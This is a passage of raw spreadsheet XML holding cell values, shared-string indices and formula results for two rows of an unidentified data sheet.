      <c r="DP53" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ53" s="108" t="s">
        <v>1079</v>
      </c>
      <c r="DR53" s="108">
        <v>2.0</v>
      </c>
      <c r="DS53" s="108">
        <v>2.0</v>
      </c>
      <c r="DT53" s="108" t="s">
        <v>1079</v>
      </c>
      <c r="DU53" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV53" s="108" t="str">
        <f t="shared" si="91"/>
        <v>2034567, 2013028</v>
      </c>
      <c r="DW53" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX53" s="108" t="s">
        <v>1079</v>
      </c>
      <c r="DY53" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ53" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA53" s="108">
        <v>0.0</v>
      </c>
      <c r="EB53" s="108">
        <v>0.0</v>
      </c>
      <c r="EC53" s="109">
        <v>1.0</v>
      </c>
      <c r="ED53" s="109">
        <v>0.0</v>
      </c>
      <c r="EE53" s="109">
        <v>0.0</v>
      </c>
      <c r="EF53" s="109">
        <v>0.0</v>
      </c>
      <c r="EG53" s="109">
        <v>0.0</v>
      </c>
      <c r="EH53" s="109">
        <v>0.0</v>
      </c>
      <c r="EI53" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ53" s="109">
        <v>0.0</v>
      </c>
      <c r="EK53" s="109">
        <v>0.0</v>
      </c>
      <c r="EL53" s="109">
        <v>0.0</v>
      </c>
      <c r="EM53" s="109">
        <v>0.0</v>
      </c>
      <c r="EN53" s="109">
        <v>0.0</v>
      </c>
      <c r="EO53" s="109">
        <v>0.0</v>
      </c>
      <c r="EP53" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ53" s="109">
        <v>0.0</v>
      </c>
      <c r="ER53" s="110">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="ES53" s="110">
        <f t="shared" si="28"/>
        <v>0</v>
      </c>
      <c r="ET53" s="110">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="EU53" s="110">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="EV53" s="110">
        <f t="shared" si="31"/>
        <v>0</v>
      </c>
      <c r="EW53" s="110">
        <f t="shared" si="32"/>
        <v>0</v>
      </c>
      <c r="EX53" s="110">
        <f t="shared" si="33"/>
        <v>0</v>
      </c>
      <c r="EY53" s="110">
        <f t="shared" si="34"/>
        <v>0</v>
      </c>
      <c r="EZ53" s="110">
        <f t="shared" si="35"/>
        <v>0</v>
      </c>
      <c r="FA53" s="110">
        <f t="shared" si="79"/>
        <v>0</v>
      </c>
      <c r="FB53" s="110">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="FC53" s="111" t="s">
        <v>1080</v>
      </c>
      <c r="FD53" s="111">
        <v>5.0</v>
      </c>
      <c r="FE53" s="111">
        <v>7.0</v>
      </c>
      <c r="FF53" s="101" t="s">
        <v>229</v>
      </c>
      <c r="FG53" s="111" t="s">
        <v>1081</v>
      </c>
      <c r="FH53" s="111">
        <v>3.0</v>
      </c>
      <c r="FI53" s="111">
        <v>5.0</v>
      </c>
      <c r="FJ53" s="111" t="s">
        <v>1080</v>
      </c>
      <c r="FK53" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FL53" s="111" t="str">
        <f t="shared" si="95"/>
        <v>2002752, 2002749, 2034567, 2013028, 2002824</v>
      </c>
      <c r="FM53" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN53" s="111" t="s">
        <v>1080</v>
      </c>
      <c r="FO53" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP53" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ53" s="111">
        <v>0.0</v>
      </c>
      <c r="FR53" s="111">
        <v>0.0</v>
      </c>
      <c r="FS53" s="112">
        <v>1.0</v>
      </c>
      <c r="FT53" s="112">
        <v>0.0</v>
      </c>
      <c r="FU53" s="112">
        <v>0.0</v>
      </c>
      <c r="FV53" s="112">
        <v>0.0</v>
      </c>
      <c r="FW53" s="112">
        <v>0.0</v>
      </c>
      <c r="FX53" s="112">
        <v>0.0</v>
      </c>
      <c r="FY53" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ53" s="112">
        <v>0.0</v>
      </c>
      <c r="GA53" s="112">
        <v>0.0</v>
      </c>
      <c r="GB53" s="112">
        <v>0.0</v>
      </c>
      <c r="GC53" s="112">
        <v>0.0</v>
      </c>
      <c r="GD53" s="112">
        <v>0.0</v>
      </c>
      <c r="GE53" s="112">
        <v>0.0</v>
      </c>
      <c r="GF53" s="112">
        <v>0.0</v>
      </c>
      <c r="GG53" s="112">
        <v>0.0</v>
      </c>
      <c r="GH53" s="113">
        <f t="shared" si="39"/>
        <v>0</v>
      </c>
      <c r="GI53" s="113">
        <f t="shared" si="40"/>
        <v>0</v>
      </c>
      <c r="GJ53" s="113">
        <f t="shared" si="41"/>
        <v>0</v>
      </c>
      <c r="GK53" s="113">
        <f t="shared" si="42"/>
        <v>0</v>
      </c>
      <c r="GL53" s="113">
        <f t="shared" si="43"/>
        <v>0</v>
      </c>
      <c r="GM53" s="113">
        <f t="shared" si="44"/>
        <v>0</v>
      </c>
      <c r="GN53" s="113">
        <f t="shared" si="45"/>
        <v>0</v>
      </c>
      <c r="GO53" s="113">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
      <c r="GP53" s="113">
        <f t="shared" si="47"/>
        <v>0</v>
      </c>
      <c r="GQ53" s="114">
        <f t="shared" si="81"/>
        <v>0</v>
      </c>
      <c r="GR53" s="113">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="GS53" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT53" s="94"/>
      <c r="GU53" s="116">
        <v>15621.0</v>
      </c>
      <c r="GV53" s="116">
        <v>1.0</v>
      </c>
      <c r="GW53" s="116">
        <v>1.0</v>
      </c>
      <c r="GX53" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY53" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ53" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA53" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB53" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC53" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD53" s="131">
        <v>15621.0</v>
      </c>
      <c r="HE53" s="131">
        <v>15621.0</v>
      </c>
      <c r="HF53" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG53" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH53" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI53" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ53" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK53" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL53" s="93">
        <v>1.0</v>
      </c>
      <c r="HM53" s="93">
        <f t="shared" si="83"/>
        <v>1</v>
      </c>
      <c r="HN53" s="93">
        <v>1.0</v>
      </c>
      <c r="HO53" s="93">
        <v>0.0</v>
      </c>
      <c r="HP53" s="93">
        <v>1.0</v>
      </c>
      <c r="HQ53" s="118">
        <f t="shared" si="53"/>
        <v>1</v>
      </c>
      <c r="HR53" s="118">
        <f t="shared" si="54"/>
        <v>1</v>
      </c>
      <c r="HS53" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT53" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU53" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV53" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HW53" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HX53" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HY53" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ53" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA53" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB53" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC53" s="120" t="s">
        <v>12</v>
      </c>
      <c r="ID53" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IE53" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF53" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG53" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH53" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II53" s="99"/>
      <c r="IJ53" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK53" s="99">
        <v>0.0</v>
      </c>
      <c r="IL53" s="99">
        <v>0.0</v>
      </c>
      <c r="IM53" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IN53" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO53" s="98">
        <v>0.0</v>
      </c>
      <c r="IP53" s="123">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="IQ53" s="118">
        <f t="shared" si="59"/>
        <v>0</v>
      </c>
      <c r="IR53" s="118">
        <f t="shared" si="60"/>
        <v>0</v>
      </c>
      <c r="IS53" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT53" s="127"/>
      <c r="IU53" s="127"/>
      <c r="IV53" s="127"/>
      <c r="IW53" s="127"/>
      <c r="IX53" s="127"/>
      <c r="IY53" s="127"/>
      <c r="IZ53" s="127"/>
      <c r="JA53" s="127"/>
      <c r="JB53" s="127"/>
      <c r="JC53" s="127"/>
      <c r="JD53" s="127"/>
      <c r="JE53" s="127"/>
      <c r="JF53" s="127"/>
      <c r="JG53" s="127"/>
      <c r="JH53" s="127"/>
      <c r="JI53" s="127"/>
      <c r="JJ53" s="127"/>
      <c r="JK53" s="127"/>
      <c r="JL53" s="127"/>
      <c r="JM53" s="127"/>
      <c r="JN53" s="127"/>
      <c r="JO53" s="127"/>
      <c r="JP53" s="127"/>
      <c r="JQ53" s="127"/>
      <c r="JR53" s="127"/>
      <c r="JS53" s="127"/>
      <c r="JT53" s="127"/>
      <c r="JU53" s="127"/>
      <c r="JV53" s="127"/>
      <c r="JW53" s="127"/>
      <c r="JX53" s="127"/>
      <c r="JY53" s="127"/>
      <c r="JZ53" s="127"/>
      <c r="KA53" s="127"/>
      <c r="KB53" s="127"/>
      <c r="KC53" s="127"/>
      <c r="KD53" s="127"/>
      <c r="KE53" s="127"/>
      <c r="KF53" s="127"/>
      <c r="KG53" s="127"/>
      <c r="KH53" s="127"/>
      <c r="KI53" s="127"/>
      <c r="KJ53" s="127"/>
      <c r="KK53" s="127"/>
      <c r="KL53" s="127"/>
      <c r="KM53" s="127"/>
      <c r="KN53" s="127"/>
      <c r="KO53" s="127"/>
      <c r="KP53" s="127"/>
      <c r="KQ53" s="127"/>
      <c r="KR53" s="127"/>
      <c r="KS53" s="127"/>
      <c r="KT53" s="127"/>
      <c r="KU53" s="127"/>
      <c r="KV53" s="127"/>
      <c r="KW53" s="127"/>
      <c r="KX53" s="127"/>
      <c r="KY53" s="127"/>
      <c r="KZ53" s="127"/>
      <c r="LA53" s="127"/>
      <c r="LB53" s="127"/>
      <c r="LC53" s="127"/>
      <c r="LD53" s="127"/>
      <c r="LE53" s="127"/>
      <c r="LF53" s="127"/>
      <c r="LG53" s="127"/>
      <c r="LH53" s="127"/>
      <c r="LI53" s="127"/>
      <c r="LJ53" s="127"/>
      <c r="LK53" s="127"/>
      <c r="LL53" s="127"/>
      <c r="LM53" s="127"/>
      <c r="LN53" s="127"/>
      <c r="LO53" s="127"/>
      <c r="LP53" s="127"/>
      <c r="LQ53" s="127"/>
      <c r="LR53" s="127"/>
      <c r="LS53" s="127"/>
      <c r="LT53" s="127"/>
      <c r="LU53" s="127"/>
      <c r="LV53" s="127"/>
      <c r="LW53" s="127"/>
      <c r="LX53" s="127"/>
      <c r="LY53" s="127"/>
      <c r="LZ53" s="127"/>
      <c r="MA53" s="127"/>
      <c r="MB53" s="127"/>
      <c r="MC53" s="127"/>
      <c r="MD53" s="127"/>
      <c r="ME53" s="127"/>
      <c r="MF53" s="127"/>
      <c r="MG53" s="127"/>
      <c r="MH53" s="127"/>
      <c r="MI53" s="127"/>
      <c r="MJ53" s="127"/>
      <c r="MK53" s="127"/>
      <c r="ML53" s="127"/>
      <c r="MM53" s="127"/>
      <c r="MN53" s="127"/>
      <c r="MO53" s="127"/>
      <c r="MP53" s="127"/>
      <c r="MQ53" s="127"/>
      <c r="MR53" s="127"/>
      <c r="MS53" s="127"/>
      <c r="MT53" s="127"/>
      <c r="MU53" s="127"/>
      <c r="MV53" s="127"/>
      <c r="MW53" s="127"/>
      <c r="MX53" s="127"/>
      <c r="MY53" s="127"/>
      <c r="MZ53" s="127"/>
      <c r="NA53" s="127"/>
      <c r="NB53" s="127"/>
      <c r="NC53" s="127"/>
      <c r="ND53" s="127"/>
      <c r="NE53" s="127"/>
      <c r="NF53" s="127"/>
      <c r="NG53" s="127"/>
      <c r="NH53" s="127"/>
      <c r="NI53" s="127"/>
      <c r="NJ53" s="127"/>
      <c r="NK53" s="127"/>
      <c r="NL53" s="127"/>
      <c r="NM53" s="127"/>
      <c r="NN53" s="127"/>
      <c r="NO53" s="127"/>
      <c r="NP53" s="127"/>
      <c r="NQ53" s="127"/>
      <c r="NR53" s="127"/>
      <c r="NS53" s="127"/>
      <c r="NT53" s="127"/>
      <c r="NU53" s="127"/>
      <c r="NV53" s="127"/>
      <c r="NW53" s="127"/>
      <c r="NX53" s="127"/>
      <c r="NY53" s="127"/>
    </row>
    <row r="54" ht="153.75" customHeight="1">
      <c r="B54" s="89" t="s">
        <v>951</v>
      </c>
      <c r="C54" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D54" s="90" t="s">
        <v>952</v>
      </c>
      <c r="E54" s="90" t="s">
        <v>1040</v>
      </c>
      <c r="F54" s="90" t="s">
        <v>1041</v>
      </c>
      <c r="G54" s="90" t="s">
        <v>12</v>
      </c>
      <c r="H54" s="90" t="s">
        <v>12</v>
      </c>
      <c r="I54" s="92" t="s">
        <v>1042</v>
      </c>
      <c r="J54" s="92" t="s">
        <v>1072</v>
      </c>
      <c r="K54" s="92" t="s">
        <v>1082</v>
      </c>
      <c r="L54" s="93" t="s">
        <v>375</v>
      </c>
      <c r="M54" s="93">
        <v>1.0</v>
      </c>
      <c r="N54" s="93">
        <v>1.0</v>
      </c>
      <c r="O54" s="93">
        <v>0.0</v>
      </c>
      <c r="P54" s="93">
        <v>1.0</v>
      </c>
      <c r="Q54" s="93">
        <v>1.0</v>
      </c>
      <c r="R54" s="93">
        <v>1.0</v>
      </c>
      <c r="S54" s="93">
        <v>0.0</v>
      </c>
      <c r="T54" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U54" s="98" t="s">
        <v>224</v>
      </c>
      <c r="V54" s="126" t="s">
        <v>1074</v>
      </c>
      <c r="W54" s="126" t="s">
        <v>1075</v>
      </c>
      <c r="X54" s="132" t="s">
        <v>1076</v>
      </c>
      <c r="Y54" s="126" t="s">
        <v>1077</v>
      </c>
      <c r="Z54" s="126" t="s">
        <v>1078</v>
      </c>
      <c r="AA54" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB54" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC54" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD54" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE54" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF54" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG54" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH54" s="99" t="s">
        <v>1047</v>
      </c>
      <c r="AI54" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ54" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AK54" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AL54" s="100">
        <v>0.0</v>
      </c>
      <c r="AM54" s="100">
        <v>0.0</v>
      </c>
      <c r="AN54" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO54" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AP54" s="100">
        <v>0.0</v>
      </c>
      <c r="AQ54" s="100">
        <v>0.0</v>
      </c>
      <c r="AR54" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS54" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT54" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AU54" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV54" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW54" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX54" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY54" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ54" s="100">
        <v>0.0</v>
      </c>
      <c r="BA54" s="102">
        <v>1.0</v>
      </c>
      <c r="BB54" s="102">
        <v>0.0</v>
      </c>
      <c r="BC54" s="102">
        <v>0.0</v>
      </c>
      <c r="BD54" s="102">
        <v>0.0</v>
      </c>
      <c r="BE54" s="102">
        <v>0.0</v>
      </c>
      <c r="BF54" s="102">
        <v>0.0</v>
      </c>
      <c r="BG54" s="102">
        <v>0.0</v>
      </c>
      <c r="BH54" s="102">
        <v>0.0</v>
      </c>
      <c r="BI54" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ54" s="102">
        <v>0.0</v>
      </c>
      <c r="BK54" s="102">
        <v>0.0</v>
      </c>
      <c r="BL54" s="103">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BM54" s="103">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="BN54" s="103">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BO54" s="103">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="BP54" s="103">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="BQ54" s="103">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="BR54" s="103">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="BS54" s="103">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="BT54" s="103">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="BU54" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV54" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW54" s="104" t="s">
        <v>1079</v>
      </c>
      <c r="BX54" s="104">
        <v>2.0</v>
      </c>
      <c r="BY54" s="104">
        <v>2.0</v>
      </c>
      <c r="BZ54" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA54" s="104" t="s">
        <v>1079</v>
      </c>
      <c r="CB54" s="104">
        <v>2.0</v>
      </c>
      <c r="CC54" s="104">
        <v>2.0</v>
      </c>
      <c r="CD54" s="104" t="s">
        <v>1079</v>
      </c>
      <c r="CE54" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF54" s="104" t="str">
        <f t="shared" si="90"/>
        <v>2034567, 2013028</v>
      </c>
      <c r="CG54" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH54" s="104" t="s">
        <v>1079</v>
      </c>
      <c r="CI54" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ54" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK54" s="104">
        <v>0.0</v>
      </c>
      <c r="CL54" s="104">
        <v>0.0</v>
      </c>
      <c r="CM54" s="105">
        <v>1.0</v>
      </c>
      <c r="CN54" s="105">
        <v>0.0</v>
      </c>
      <c r="CO54" s="105">
        <v>0.0</v>
      </c>
      <c r="CP54" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ54" s="105">
        <v>0.0</v>
      </c>
      <c r="CR54" s="105">
        <v>0.0</v>
      </c>
      <c r="CS54" s="105">
        <v>0.0</v>
      </c>
      <c r="CT54" s="105">
        <v>0.0</v>
      </c>
      <c r="CU54" s="105">
        <v>0.0</v>
      </c>
      <c r="CV54" s="105">
        <v>0.0</v>
      </c>
      <c r="CW54" s="105">
        <v>0.0</v>
      </c>
      <c r="CX54" s="105">
        <v>0.0</v>
      </c>
      <c r="CY54" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ54" s="105">
        <v>0.0</v>
      </c>
      <c r="DA54" s="105">
        <v>0.0</v>
      </c>
      <c r="DB54" s="106">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="DC54" s="106">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="DD54" s="106">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="DE54" s="106">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
      <c r="DF54" s="106">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="DG54" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH54" s="106">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="DI54" s="106">
        <f t="shared" si="22"/>
        <v>0</v>
      </c>
      <c r="DJ54" s="106">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="DK54" s="107">
        <f t="shared" si="77"/>
        <v>0</v>
      </c>
      <c r="DL54" s="106">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="DM54" s="108" t="s">
        <v>1079</v>
      </c>
      <c r="DN54" s="108">
        <v>2.0</v>
      </c>
      <c r="DO54" s="108">
        <v>2.0</v>
      </c>
      <c r="DP54" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ54" s="108" t="s">
        <v>1079</v>
      </c>
      <c r="DR54" s="108">
        <v>2.0</v>
      </c>
      <c r="DS54" s="108">
        <v>2.0</v>
      </c>
      <c r="DT54" s="108" t="s">
        <v>1079</v>
      </c>
      <c r="DU54" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV54" s="108" t="str">
        <f t="shared" si="91"/>
        <v>2034567, 2013028</v>
      </c>
      <c r="DW54" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX54" s="108" t="s">
        <v>1079</v>
      </c>
      <c r="DY54" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ54" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA54" s="108">
        <v>0.0</v>
      </c>
      <c r="EB54" s="108">
        <v>0.0</v>
      </c>
      <c r="EC54" s="109">
        <v>1.0</v>
      </c>
      <c r="ED54" s="109">
        <v>0.0</v>
      </c>
      <c r="EE54" s="109">
        <v>0.0</v>
      </c>
      <c r="EF54" s="109">
        <v>0.0</v>
      </c>
      <c r="EG54" s="109">
        <v>0.0</v>
      </c>
      <c r="EH54" s="109">
        <v>0.0</v>
      </c>
      <c r="EI54" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ54" s="109">
        <v>0.0</v>
      </c>
      <c r="EK54" s="109">
        <v>0.0</v>
      </c>
      <c r="EL54" s="109">
        <v>0.0</v>
      </c>
      <c r="EM54" s="109">
        <v>0.0</v>
      </c>
      <c r="EN54" s="109">
        <v>0.0</v>
      </c>
      <c r="EO54" s="109">
        <v>0.0</v>
      </c>
      <c r="EP54" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ54" s="109">
        <v>0.0</v>
      </c>
      <c r="ER54" s="110">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="ES54" s="110">
        <f t="shared" si="28"/>
        <v>0</v>
      </c>
      <c r="ET54" s="110">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="EU54" s="110">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="EV54" s="110">
        <f t="shared" si="31"/>
        <v>0</v>
      </c>
      <c r="EW54" s="110">
        <f t="shared" si="32"/>
        <v>0</v>
      </c>
      <c r="EX54" s="110">
        <f t="shared" si="33"/>
        <v>0</v>
      </c>
      <c r="EY54" s="110">
        <f t="shared" si="34"/>
        <v>0</v>
      </c>
      <c r="EZ54" s="110">
        <f t="shared" si="35"/>
        <v>0</v>
      </c>
      <c r="FA54" s="110">
        <f t="shared" si="79"/>
        <v>0</v>
      </c>
      <c r="FB54" s="110">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="FC54" s="111" t="s">
        <v>1080</v>
      </c>
      <c r="FD54" s="111">
        <v>5.0</v>
      </c>
      <c r="FE54" s="111">
        <v>7.0</v>
      </c>
      <c r="FF54" s="101" t="s">
        <v>229</v>
      </c>
      <c r="FG54" s="111" t="s">
        <v>1081</v>
      </c>
      <c r="FH54" s="111">
        <v>3.0</v>
      </c>
      <c r="FI54" s="111">
        <v>5.0</v>
      </c>
      <c r="FJ54" s="111" t="s">
        <v>1080</v>
      </c>
      <c r="FK54" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FL54" s="111" t="str">
        <f t="shared" si="95"/>
        <v>2002752, 2002749, 2034567, 2013028, 2002824</v>
      </c>
      <c r="FM54" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN54" s="111" t="s">
        <v>1080</v>
      </c>
      <c r="FO54" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP54" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ54" s="111">
        <v>0.0</v>
      </c>
      <c r="FR54" s="111">
        <v>0.0</v>
      </c>
      <c r="FS54" s="112">
        <v>1.0</v>
      </c>
      <c r="FT54" s="112">
        <v>0.0</v>
      </c>
      <c r="FU54" s="112">
        <v>0.0</v>
      </c>
      <c r="FV54" s="112">
        <v>0.0</v>
      </c>
      <c r="FW54" s="112">
        <v>0.0</v>
      </c>
      <c r="FX54" s="112">
        <v>0.0</v>
      </c>
      <c r="FY54" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ54" s="112">
        <v>0.0</v>
      </c>
      <c r="GA54" s="112">
        <v>0.0</v>
      </c>
      <c r="GB54" s="112">
        <v>0.0</v>
      </c>
      <c r="GC54" s="112">
        <v>0.0</v>
      </c>
      <c r="GD54" s="112">
        <v>0.0</v>
      </c>
      <c r="GE54" s="112">
        <v>0.0</v>
      </c>
      <c r="GF54" s="112">
        <v>0.0</v>
      </c>
      <c r="GG54" s="112">
        <v>0.0</v>
      </c>
      <c r="GH54" s="113">
        <f t="shared" si="39"/>
        <v>0</v>
      </c>
      <c r="GI54" s="113">
        <f t="shared" si="40"/>
        <v>0</v>
      </c>
      <c r="GJ54" s="113">
        <f t="shared" si="41"/>
        <v>0</v>
      </c>
      <c r="GK54" s="113">
        <f t="shared" si="42"/>
        <v>0</v>
      </c>
      <c r="GL54" s="113">
        <f t="shared" si="43"/>
        <v>0</v>
      </c>
      <c r="GM54" s="113">
        <f t="shared" si="44"/>
        <v>0</v>
      </c>
      <c r="GN54" s="113">
        <f t="shared" si="45"/>
        <v>0</v>
      </c>
      <c r="GO54" s="113">
        <f t="shared" si="46"/>
        <v>0</v>
      </c>
      <c r="GP54" s="113">
        <f t="shared" si="47"/>
        <v>0</v>
      </c>
      <c r="GQ54" s="114">
        <f t="shared" si="81"/>
        <v>0</v>
      </c>
      <c r="GR54" s="113">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="GS54" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT54" s="94"/>
      <c r="GU54" s="116">
        <v>15621.0</v>
      </c>
      <c r="GV54" s="116">
        <v>1.0</v>
      </c>
      <c r="GW54" s="116">
        <v>1.0</v>
      </c>
      <c r="GX54" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY54" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ54" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA54" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB54" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC54" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD54" s="131">
        <v>15621.0</v>
      </c>
      <c r="HE54" s="131">
        <v>15621.0</v>
      </c>
      <c r="HF54" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG54" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH54" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI54" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ54" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK54" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL54" s="93">
        <v>1.0</v>
      </c>
      <c r="HM54" s="93">
        <f t="shared" si="83"/>
        <v>1</v>
      </c>
      <c r="HN54" s="93">
        <v>1.0</v>
      </c>
      <c r="HO54" s="93">
        <v>0.0</v>
      </c>
      <c r="HP54" s="93">
        <v>1.0</v>
      </c>
      <c r="HQ54" s="118">
        <f t="shared" si="53"/>
        <v>1</v>
      </c>
      <c r="HR54" s="118">
        <f t="shared" si="54"/>
        <v>1</v>
      </c>
      <c r="HS54" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT54" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU54" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV54" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HW54" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HX54" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HY54" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ54" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA54" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB54" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC54" s="120" t="s">
        <v>12</v>
      </c>
      <c r="ID54" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IE54" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF54" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG54" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH54" s="120" t="s">
        <v>12</v>
      </c>
